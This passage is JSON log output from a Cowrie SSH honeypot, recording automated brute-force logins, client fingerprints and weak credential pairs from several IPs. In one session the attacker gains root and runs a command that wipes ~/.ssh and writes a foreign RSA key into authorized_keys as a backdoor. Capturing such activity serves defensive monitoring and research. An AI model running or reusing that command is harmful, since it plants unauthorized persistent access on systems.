-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T01:52:37.210778Z","src_ip":"212.227.125.160","session":"ab900e57dbb7"}
{"eventid":"cowrie.login.failed","username":"dspace","password":"1234567","message":"login attempt [dspace/1234567] failed","sensor":"my-vps","timestamp":"2025-08-31T01:52:39.096903Z","src_ip":"212.227.125.160","session":"ab900e57dbb7"}
{"eventid":"cowrie.session.closed","duration":"3.9","message":"Connection lost after 3.9 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:52:40.648590Z","src_ip":"212.227.125.160","session":"ab900e57dbb7"}
{"eventid":"cowrie.session.closed","duration":31.45078706741333,"message":"Connection lost after 31 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:52:57.772861Z","src_ip":"212.227.125.160","session":"d9741ecc498a"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":58346,"dst_ip":"1.2.3.4","dst_port":22,"session":"d27dc8bd7d12","protocol":"ssh","message":"New connection: 212.227.235.229:58346 (1.2.3.4:22) [session: d27dc8bd7d12]","sensor":"my-vps","timestamp":"2025-08-31T01:53:15.936252Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T01:53:16.736056Z","src_ip":"212.227.235.229","session":"d27dc8bd7d12"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T01:53:16.737431Z","src_ip":"212.227.235.229","session":"d27dc8bd7d12"}
{"eventid":"cowrie.session.connect","src_ip":"115.190.94.119","src_port":52476,"dst_ip":"1.2.3.4","dst_port":22,"session":"6dc0480fe57b","protocol":"ssh","message":"New connection: 115.190.94.119:52476 (1.2.3.4:22) [session: 6dc0480fe57b]","sensor":"my-vps","timestamp":"2025-08-31T01:53:17.385946Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T01:53:17.386840Z","src_ip":"115.190.94.119","session":"6dc0480fe57b"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T01:53:17.592595Z","src_ip":"115.190.94.119","session":"6dc0480fe57b"}
{"eventid":"cowrie.login.failed","username":"user","password":"1234Qwer","message":"login attempt [user/1234Qwer] failed","sensor":"my-vps","timestamp":"2025-08-31T01:53:18.483445Z","src_ip":"115.190.94.119","session":"6dc0480fe57b"}
{"eventid":"cowrie.login.failed","username":"dspace","password":"12345678","message":"login attempt [dspace/12345678] failed","sensor":"my-vps","timestamp":"2025-08-31T01:53:22.835956Z","src_ip":"212.227.235.229","session":"d27dc8bd7d12"}
{"eventid":"cowrie.session.closed","duration":"9.0","message":"Connection lost after 9.0 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:53:24.901214Z","src_ip":"212.227.235.229","session":"d27dc8bd7d12"}
{"eventid":"cowrie.session.connect","src_ip":"82.67.125.95","src_port":41726,"dst_ip":"1.2.3.4","dst_port":22,"session":"e0d5f2421a5e","protocol":"ssh","message":"New connection: 82.67.125.95:41726 (1.2.3.4:22) [session: e0d5f2421a5e]","sensor":"my-vps","timestamp":"2025-08-31T01:53:31.983883Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T01:53:31.984787Z","src_ip":"82.67.125.95","session":"e0d5f2421a5e"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T01:53:32.021039Z","src_ip":"82.67.125.95","session":"e0d5f2421a5e"}
{"eventid":"cowrie.login.failed","username":"nima","password":"P@ssw0rd","message":"login attempt [nima/P@ssw0rd] failed","sensor":"my-vps","timestamp":"2025-08-31T01:53:32.206544Z","src_ip":"82.67.125.95","session":"e0d5f2421a5e"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:53:33.244488Z","src_ip":"82.67.125.95","session":"e0d5f2421a5e"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":49008,"dst_ip":"1.2.3.4","dst_port":22,"session":"5678a23ac190","protocol":"ssh","message":"New connection: 212.227.125.160:49008 (1.2.3.4:22) [session: 5678a23ac190]","sensor":"my-vps","timestamp":"2025-08-31T01:53:37.811143Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T01:53:38.437150Z","src_ip":"212.227.125.160","session":"5678a23ac190"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T01:53:38.439689Z","src_ip":"212.227.125.160","session":"5678a23ac190"}
{"eventid":"cowrie.login.failed","username":"dspace","password":"12345678","message":"login attempt [dspace/12345678] failed","sensor":"my-vps","timestamp":"2025-08-31T01:53:41.236980Z","src_ip":"212.227.125.160","session":"5678a23ac190"}
{"eventid":"cowrie.session.closed","duration":"5.0","message":"Connection lost after 5.0 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:53:42.776710Z","src_ip":"212.227.125.160","session":"5678a23ac190"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":39666,"dst_ip":"1.2.3.4","dst_port":22,"session":"b3c3c533c5f2","protocol":"ssh","message":"New connection: 212.227.235.229:39666 (1.2.3.4:22) [session: b3c3c533c5f2]","sensor":"my-vps","timestamp":"2025-08-31T01:54:17.585438Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T01:54:18.369807Z","src_ip":"212.227.235.229","session":"b3c3c533c5f2"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T01:54:18.370579Z","src_ip":"212.227.235.229","session":"b3c3c533c5f2"}
{"eventid":"cowrie.login.failed","username":"dspace","password":"123456789","message":"login attempt [dspace/123456789] failed","sensor":"my-vps","timestamp":"2025-08-31T01:54:24.416456Z","src_ip":"212.227.235.229","session":"b3c3c533c5f2"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":49404,"dst_ip":"1.2.3.4","dst_port":22,"session":"3a4a66c34390","protocol":"ssh","message":"New connection: 212.227.125.160:49404 (1.2.3.4:22) [session: 3a4a66c34390]","sensor":"my-vps","timestamp":"2025-08-31T01:54:25.584747Z"}
{"eventid":"cowrie.session.closed","duration":"8.8","message":"Connection lost after 8.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:54:26.370002Z","src_ip":"212.227.235.229","session":"b3c3c533c5f2"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T01:54:27.007120Z","src_ip":"212.227.125.160","session":"3a4a66c34390"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T01:54:27.007796Z","src_ip":"212.227.125.160","session":"3a4a66c34390"}
{"eventid":"cowrie.session.connect","src_ip":"82.67.125.95","src_port":33426,"dst_ip":"1.2.3.4","dst_port":22,"session":"111694261510","protocol":"ssh","message":"New connection: 82.67.125.95:33426 (1.2.3.4:22) [session: 111694261510]","sensor":"my-vps","timestamp":"2025-08-31T01:54:30.350744Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T01:54:30.351474Z","src_ip":"82.67.125.95","session":"111694261510"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T01:54:30.387130Z","src_ip":"82.67.125.95","session":"111694261510"}
{"eventid":"cowrie.login.success","username":"root","password":"Abc-1234","message":"login attempt [root/Abc-1234] succeeded","sensor":"my-vps","timestamp":"2025-08-31T01:54:30.574127Z","src_ip":"82.67.125.95","session":"111694261510"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T01:54:30.661174Z","src_ip":"82.67.125.95","session":"111694261510"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-31T01:54:30.661912Z","src_ip":"82.67.125.95","session":"111694261510"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-31T01:54:30.662875Z","src_ip":"82.67.125.95","session":"111694261510"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.0","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:54:30.699984Z","src_ip":"82.67.125.95","session":"111694261510"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T01:54:30.830139Z","src_ip":"82.67.125.95","session":"111694261510"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-31T01:54:30.830839Z","src_ip":"82.67.125.95","session":"111694261510"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-31T01:54:30.868646Z","src_ip":"82.67.125.95","session":"111694261510"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.0","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:54:30.869535Z","src_ip":"82.67.125.95","session":"111694261510"}
{"eventid":"cowrie.session.connect","src_ip":"82.67.125.95","src_port":33440,"dst_ip":"1.2.3.4","dst_port":22,"session":"6ebd8c3a93d6","protocol":"ssh","message":"New connection: 82.67.125.95:33440 (1.2.3.4:22) [session: 6ebd8c3a93d6]","sensor":"my-vps","timestamp":"2025-08-31T01:54:30.898609Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T01:54:30.899444Z","src_ip":"82.67.125.95","session":"6ebd8c3a93d6"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T01:54:30.929804Z","src_ip":"82.67.125.95","session":"6ebd8c3a93d6"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-31T01:54:31.092107Z","src_ip":"82.67.125.95","session":"6ebd8c3a93d6"}
{"eventid":"cowrie.session.closed","duration":"1.2","message":"Connection lost after 1.2 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:54:32.125434Z","src_ip":"82.67.125.95","session":"6ebd8c3a93d6"}
{"eventid":"cowrie.session.connect","src_ip":"82.67.125.95","src_port":33456,"dst_ip":"1.2.3.4","dst_port":22,"session":"567f215dbc56","protocol":"ssh","message":"New connection: 82.67.125.95:33456 (1.2.3.4:22) [session: 567f215dbc56]","sensor":"my-vps","timestamp":"2025-08-31T01:54:32.155464Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T01:54:32.156317Z","src_ip":"82.67.125.95","session":"567f215dbc56"}
